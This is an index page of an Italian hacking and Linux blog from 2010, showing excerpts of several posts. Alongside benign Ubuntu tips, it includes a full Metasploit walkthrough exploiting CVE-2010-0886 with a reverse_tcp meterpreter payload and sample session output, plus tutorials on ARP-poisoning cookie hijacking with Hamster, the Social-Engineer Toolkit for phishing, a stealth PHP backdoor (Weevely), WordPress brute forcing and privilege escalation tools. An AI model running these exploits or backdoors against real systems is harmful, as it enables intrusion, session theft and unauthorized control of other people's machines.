Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Reverse connection | Share Desktop

luglio 20th, 2010 by clshack

In “hacking”, si sente spesso parlare di reverse shelle o bind shell .

Spiegazione rapida rapida:

La reverse shell,la più utilizzata, a differenza della bind shell, si connette a noi, ad una nostra porta aperta, fornendoci ad esempio un prompt di comandi.

Invece, la bind shell, cerca di aprirsi una porta sul computer stesso, dove noi ci andremo a connettere.

Ormai, però non funziona quasi più, poichè i pc sono quasi tutti dietro a router/firewall.

Guardano un po’ sul web, ho trovato una cosa molto bella :D
Condividere il desktop in reverse connection.
Cioè il client sta in ascolto e il server ci invia i dati :D

Vediamo come connetterci ad ubuntu da remoto, senza aprire la porta ad ubuntu :D


Questo tipo di connessione offre notevoli vantaggi, visto che non dovremo aprire porte sul firewall ubuntu, perciò un eventuale attaccker, non potrà vedere che abbiamo il server vnc attivo, e sfruttare eventuali vulnerabilità o tentando attacchi brute force o altre cose :D
More…

Tags: , , ,
Posted in Articoli su GNU/Linux, GNU/Linux, Software | No Comments »

HTTP session hijacking with Ettercap and Hamster

luglio 18th, 2010 by clshack

Grazie ad ettercap, è possibile effettuare in semplicità attacchi arp poisoning.

Per ulteriori approfondimenti:
TUTORIAL

Hamster, è un tool, che estrae dai pacchetti catturati con wireshark, durante un attacco arp poisoning, tutti i cookie.

In questo modo, non essendo loggati, sfruttando il cookie della vittima, nel 90 % dei casi potremo usufruire delle pagine in cui è loggato, ad esempio gmail.

Dal sito ufficiale:

Hamster is a proxy server.
There are a couple ways sidejacking could work.
One way would be a browser add-on.
Another way would be as a proxy server.
The hacker would connect through the proxy, which would then rewrite the cookies on behalf of the hacker.
The following shows Hamster in action. On this screen, we see the web browser “console” screen.

Vediamo come utilizzarlo sul nostro ubuntino :D

Apriamo la nostra console o.O
sudo -s
wget http://www.clshack.it/nopaste/install_hamster.sh
More…

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[UBUNTU/LINUX] Automatic INSTALL :D

luglio 15th, 2010 by clshack

Quando si formattano spesso i pc, ci si rompe le palle a installare su ogni uno gli stessi software, a sistemare le impostazioni e così via.
Per ovviare questo problema, un po’ di tempo fa ho proposto questo:

Trasporta la tua installazzione di UBUNTU su LIVE CD
Remastersys è un ottimo tool, però, volevo qualcosa di ancora più minimale e ottimale, e sopratutto che facesse tutto in automatico.

Girando e girando su google, finalmente ho trovato ciò che mi serviva :D
kickstart Configuration

Ho visto che funziona su redhat, debian , ubuntu e molte altre distribuzioni.

Vediamo come installarlo su ubuntu e iniziare a creare il file per l’installazione automatica del sistema:

Apriamo il nostro terminalino :D
sudo apt-get install -y system-config-kickstart
More…

Tags: , , , ,
Posted in Articoli su GNU/Linux, GNU/Linux, Software | 4 Comments »

Google (in)security ? o.O

luglio 10th, 2010 by clshack

E’ 10 giorni che ho la febbre non passa più porco cazzo merda aaaaaaaaa poi con sto caldo di merda aaaaaaaa vabbè.

Dicono che alla segnalazione di bug, rispondano così:

Si, è vero, è un bug, ma non sappiamo come patchare.. hai qualche suggerimento?


Stiamo parlando della google security, non penso siano così idioti.

Però, sinceramente non stanno molto attenti alla sicurezza.

Un paio di anni fa’, evilsocket, ha dimostrato che caricando su igoogle Gadgets fatto ad hoc, è possibile prendere il controllo del browser della vittima.

Evil, faceva solo un alert(document.cookie), ma se avesse inserito script come beef ?o.O

Tutto questo perchè google non effettua un controllo sui Gadgets caricati dagli utenti.

D’altronde non può nemmeno controllare a mano i tantissimi Gadgets che vengono caricati giornalmente.

Questo problema è valido anche per le estensioni di google chrome oppure di firefox, dove è stato trovato un worm.
More…

Tags: , ,
Posted in Hacking | 6 Comments »

[Ubuntu-Server] Auto login and Startx :D

giugno 30th, 2010 by clshack

E’ da un po’ che non scrivo articoli su ubuntu, ma il tempo non basta mai.

Dopo una installazione minimale di ubuntu (netinstall), e una installazione core di lxde, volevo togliermi anche la procedura di login, volevo un login AUTOMATICO :D

Dove cercare ?

Su una live cd ubuntu, visto che esse si autologgano con l’utente “ubuntu“.

Alla fine, tra un casino e altro ho trovato come fare.

Allora, apriamo con privilegi root il file: /etc/init/tty1.conf.

sudo geany /etc/init/tty1.conf

More…

Tags: ,
Posted in Articoli su GNU/Linux | 6 Comments »

[How To] Social Engineering Toolkit with Metasploit

giugno 27th, 2010 by clshack

Il Social-Engineering Toolkit (SET) è stato realizzato da David Kennedy e mette a disposizione degli attacker alcuni notevoli exploit, di tipo Social-Engineering con una comoda interfaccia :D

L’obiettivo principale di SET è la automazione di tali attacchi, sfruttando quasi sempre la stupidità umana.

Vediamo come utilizzarlo.
sudo apt-get install python-pexpect
Dobbiamo fare un link simbolico altrimenti non va SET se non abbiamo backtrack 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
Ad esempio:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/


Andiamo nel terminale, e scarichiamo la versione più aggiornata:

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET
sudo ./set
Una volta aperto, avremo un menù un po’ lamerico -.-’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Vediamo nel dettaglio le opzioni.

1. Spear-Phishing Attack Vectors
Digitando 1, avremo sostanzialmente 3 opzioni:

  • Perform a Mass Email Attack
  • Create a FileFormat Payload
  • Create a Social-Engineering Template

More…

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 8 Comments »

[Metasploit]Sun Java Web Start Plugin Remote Code Excution

giugno 27th, 2010 by clshack

Exploit, abbastanza vecchio, CVE-2010-0886, ma ne parlo lo stesso per un ovvio motivo.

Se siete su windows, account limitato, java NON SI AGGIORNA, al meno che non abbiate la password di amministrator.
Problema al quanto risolvibile, almeno per me, ma non per molti altri.

Soluzioni contro questo exploit ?
Upgrade to J2SE 1.4.2_07
Upgrade to J2SE 5.0 Update 2

Ma se uno è utente limitato come fa ad aggiornare, al meno che non ci sia un server che distribuisca e installa gli aggiornamenti all’avvio/spegnimento di windows, cosa rara, gli utenti sono tutti FOTTUTI.

Vediamo come usare questo exploit, in metasploit:
sudo svn update
sudo ./msfconsole
use windows/browser/java_ws_arginject_altjvm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set SRVPORT 80

Se avete apache:
sudo service apache2 stop

set URIPATH /
exploit
Output simile:
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.39:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.39:80/
[*] Server started.

Ora facciamo visitare alla vittima:
http://YOUR_IP:80
Output simile:

[*] Request for "/" does not contain a sub-directory, redirecting to /X2EbB9v10GNe/ ...
[*] Responding to "GET /X2EbB9v10GNe/" request from 192.168.1.154:1105
[*] Sending js detection HTML to 192.168.1.154:1105...
[*] Responding to "GET /X2EbB9v10GNe/ijIcZf4C.shtml" request from 192.168.1.154:1105
[*] Sending JS version HTML to 192.168.1.154:1105...

E se tutto va bene:
sessions -i 1

e vi si pare meterpreter :D

Tags: , , , ,
Posted in Hacking | 5 Comments »

PHP backdoor with Weevely

giugno 25th, 2010 by clshack

Weevely è un tool studiato per creare e gestire una backdoor nascosta su webserver remoti php.

Weevely cifra le comunicazioni tra client e server dentro campi HTTP_REFERER plausibili per occultarsi a NIDS e a ricerche nei log del webserver.
Weevely permette di:


Generare la backdoor PHP cifrata dinamicamente

  • Eseguire comandi sulla shell remota, offuscando le richieste dentro HTTP_REFERER plausibili
  • Simulare un terminale per inviare comandi alla shell remota come sopra
  • Eludere alcune configurazioni di PHP che limitano l’esecuzione di comandi sul sistema
  • Eseguire moduli sulla macchina remota per automatizzare compiti.
  • Aggiungere nuovi moduli in maniera facile e veloce

Scritto in python e open source.
Per l’installazione su debian/ubuntu:
sudo apt-get install python-numpy
More…

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 8 Comments »

[Python]WordPress brute force script :D

giugno 23rd, 2010 by clshack

Sicurezza sempre meno… colpa di chi ? Quasi sempre nostra… ad esempio un coglione H4, un po’ di tempo fa è entrato nel blog del nostro amico sskull.

Come ha fatto ?

Con un attacco brute force, il nostro amico sskull aveva lasciato una password un po’ troppo debole e quel merda di bambino è entrato…
More…

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 12 Comments »

[tutorial]Tool for Privilege Escalation

giugno 23rd, 2010 by clshack

Letture consigliate:
[tutorial]Tool for Information Gathering
[tutorial]Tool for Network Mapping

[tutorial]Tool for Vulnerability Identification level Server
[tutorial]Tool for Vulnerability Identification level WEB

Da wikipedia, leggiamo:

Privilege escalation o in italiano scalata dei privilegi è l’atto di sfruttare una falla in un software applicativo per ottenere l’accesso a risorse che normalmente sarebbero protette da un’applicazione o dall’utente.
Il risultato è che l’applicazione esegue azioni con più privilegi di quelli dovuti e voluti dallo sviluppatore o dall’amministratore di sistema.


Pensate, ad esempio se su un server riuscissimo ad avere i privilegi root :D
In questo articolo, vedremo dei tools, che ci permettono di “scalare i privilegi”, cioè di ottenere privilegi root su linux e system su windows.
More…

Tags: , , , , , , ,
Posted in GNU/Linux, Hacking, Software | 6 Comments »
« Older Entries
Newer Entries »